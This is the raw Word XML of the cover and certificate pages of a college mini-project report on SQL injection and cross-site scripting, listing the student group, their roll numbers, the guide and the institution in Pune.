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EFA3" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="43" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="10" w:right="341"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000008"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">MINI PROJECT REPORT </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CA1B1B" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="43" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="10" w:right="341"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000008"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>ON</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347E9AF3" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="350" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL INJECTION AND CROSS SITE SCRIPTING </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780B2255" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="35"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3110B6" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="35"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5AFD72" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="336" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="206" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">BACHELOR OF ENGINEERING (COMPUTER ENGINEERING) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB9C467" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="218" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="349" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000008"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>SUBMITTED BY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB0498E" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F02B7E1" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="4962" w:type="dxa"/>
        <w:tblInd w:w="2201" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4157"/>
        <w:gridCol w:w="805"/>
      </w:tblGrid>
      <w:tr w:rsidR="00842E6C" w14:paraId="2B8E82D9" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="357"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4157" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="26553723" w14:textId="5A72D4ED" w:rsidR="00842E6C" w:rsidRDefault="00D31DA4">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00D31DA4">
              <w:rPr>
                <w:sz w:val="29"/>
              </w:rPr>
              <w:t>Shreya Dharmadhikari</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="805" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2E31120F" w14:textId="51573845" w:rsidR="00842E6C" w:rsidRDefault="00D31DA4">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="2" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00D31DA4">
              <w:rPr>
                <w:sz w:val="29"/>
              </w:rPr>
              <w:t>41016</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00842E6C" w14:paraId="19729440" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="484"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4157" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="153E778E" w14:textId="5CDE8EA3" w:rsidR="00842E6C" w:rsidRDefault="00D31DA4">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00D31DA4">
              <w:rPr>
                <w:sz w:val="29"/>
              </w:rPr>
              <w:t>Vaishnavi Jadhav</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="805" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="187D4952" w14:textId="28940F15" w:rsidR="00842E6C" w:rsidRDefault="00D31DA4">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00D31DA4">
              <w:rPr>
                <w:sz w:val="29"/>
              </w:rPr>
              <w:t>41026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00842E6C" w14:paraId="70C61797" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="518"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4157" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5BAE1D56" w14:textId="6851B4A6" w:rsidR="00842E6C" w:rsidRDefault="00D31DA4">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00D31DA4">
              <w:rPr>
                <w:sz w:val="29"/>
              </w:rPr>
              <w:t>Chaitanya Kulkarni</w:t>
            </w:r>
            <w:r w:rsidR="000E5BEC">
              <w:rPr>
                <w:sz w:val="29"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="805" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="41A84E06" w14:textId="03A10E9A" w:rsidR="00842E6C" w:rsidRDefault="00D31DA4">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="34" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00D31DA4">
              <w:rPr>
                <w:sz w:val="29"/>
              </w:rPr>
              <w:t>41043</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00842E6C" w14:paraId="72A405E6" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="392"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4157" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="7A83ECC5" w14:textId="6112DB41" w:rsidR="00842E6C" w:rsidRDefault="00D31DA4">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00D31DA4">
              <w:rPr>
                <w:sz w:val="29"/>
              </w:rPr>
              <w:t>Manas Sonawane</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="805" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="321F3794" w14:textId="503E4362" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="2" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="29"/>
              </w:rPr>
              <w:t>41</w:t>
            </w:r>
            <w:r w:rsidR="00766A10">
              <w:rPr>
                <w:sz w:val="29"/>
              </w:rPr>
              <w:t>072</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="29"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1983404B" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B463AE9" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304EE94B" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E58A442" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A252CB" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334EEEEB" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7630778C" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="43" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="3751" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DEF6008" wp14:editId="3343DE6F">
            <wp:extent cx="1123188" cy="1316736"/>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1123188" cy="1316736"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C672F52" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8F2132" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F97525" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B10018E" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="141" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70187AC0" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="23" w:line="263" w:lineRule="auto"/>
        <w:ind w:left="1990" w:right="2344" w:hanging="96"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t xml:space="preserve">DEPARTMENT OF COMPUTER ENGINEERING P.E.S MODERN COLLEGE OF ENGINEERING PUNE - 411005. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762A139A" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SAVITRIBAI PHULE PUNE UNIVERSITY </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D1715D" w14:textId="07523C78" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC" w:rsidP="00D31DA4">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="256" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t xml:space="preserve">[2021 - 22] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F6F798" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="10" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4DB925C2" wp14:editId="52EA70B9">
            <wp:extent cx="1077468" cy="1229868"/>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8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1077468" cy="1229868"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8550E6" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="24" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377D3064" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="94" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B645F1" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="193" w:line="334" w:lineRule="auto"/>
        <w:ind w:left="1857" w:right="2280" w:hanging="62"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000008"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Progressive Education Society’s Modern College of Engineering Department of Computer Engineering Shivajinagar, Pune - 411005.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A611AE" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="0"/>
        <w:ind w:right="505"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t>CERTIFICATE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750125F6" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="62" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481A41D5" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="44" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CAC95F8" w14:textId="6129D5EB" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC" w:rsidP="00D31DA4">
      <w:pPr>
        <w:spacing w:after="3" w:line="277" w:lineRule="auto"/>
        <w:ind w:left="535" w:right="987"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000008"/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t xml:space="preserve">This is to certify that the following students of Final Year Computer Engineering of PES’s, Modern College of Engineering have successfully completed the Laboratory Practice III (Mini Project) under the guidance of Mrs. </w:t>
      </w:r>
      <w:r w:rsidR="00F40795" w:rsidRPr="00F40795">
        <w:rPr>
          <w:color w:val="000008"/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>Prajakta</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40795">
        <w:rPr>
          <w:color w:val="000008"/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F40795">
        <w:rPr>
          <w:color w:val="000008"/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>Puranik</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2401FBE0" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B287D5D" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="506" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000008"/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>The Group Members are:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5E5371" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="4477" w:type="dxa"/>
        <w:tblInd w:w="2482" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3782"/>
        <w:gridCol w:w="695"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D31DA4" w14:paraId="0348DB6E" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3782" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4CB3FD3A" w14:textId="7329257F" w:rsidR="00D31DA4" w:rsidRDefault="00D31DA4" w:rsidP="00D31DA4">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00E238C1">
              <w:t>Shreya Dharmadhikari</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="695" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3006787B" w14:textId="1D6951E8" w:rsidR="00D31DA4" w:rsidRDefault="00D31DA4" w:rsidP="00D31DA4">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00E238C1">
              <w:t>41016</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D31DA4" w14:paraId="4C2F176F" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="358"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3782" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1D16CF26" w14:textId="513339C2" w:rsidR="00D31DA4" w:rsidRDefault="00D31DA4" w:rsidP="00D31DA4">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00E238C1">
              <w:t>Vaishnavi Jadhav</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="695" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0F15A386" w14:textId="4A32C2E9" w:rsidR="00D31DA4" w:rsidRDefault="00D31DA4" w:rsidP="00D31DA4">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00E238C1">
              <w:t>41026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
